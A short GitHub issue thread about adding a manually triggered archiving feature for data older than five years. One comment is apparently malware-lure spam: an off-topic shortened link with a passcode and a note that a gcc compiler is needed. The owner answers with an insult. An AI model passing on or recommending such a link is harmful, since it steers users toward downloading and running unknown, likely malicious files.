### ISSUE TITLE
Implement Data Archiving for Data stored longer that 5 years

### ISSUE THREAD

**Issue by itsmenewbie03** [itsmenewbie03/project-rapport#64]
We will add a button for the admin to start the archiving process. We could make this execute automatically however that behavior could eventually lead to unexpected slow down as the database grows. With that we will make the archiving to be triggered manually.

**Comment by sanketkorde** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by itsmenewbie03** [comment]
> Give this a shot https://bit.ly/4eaAnWN Passcode: changeme you must have a gcc compiler

FUCK YOU
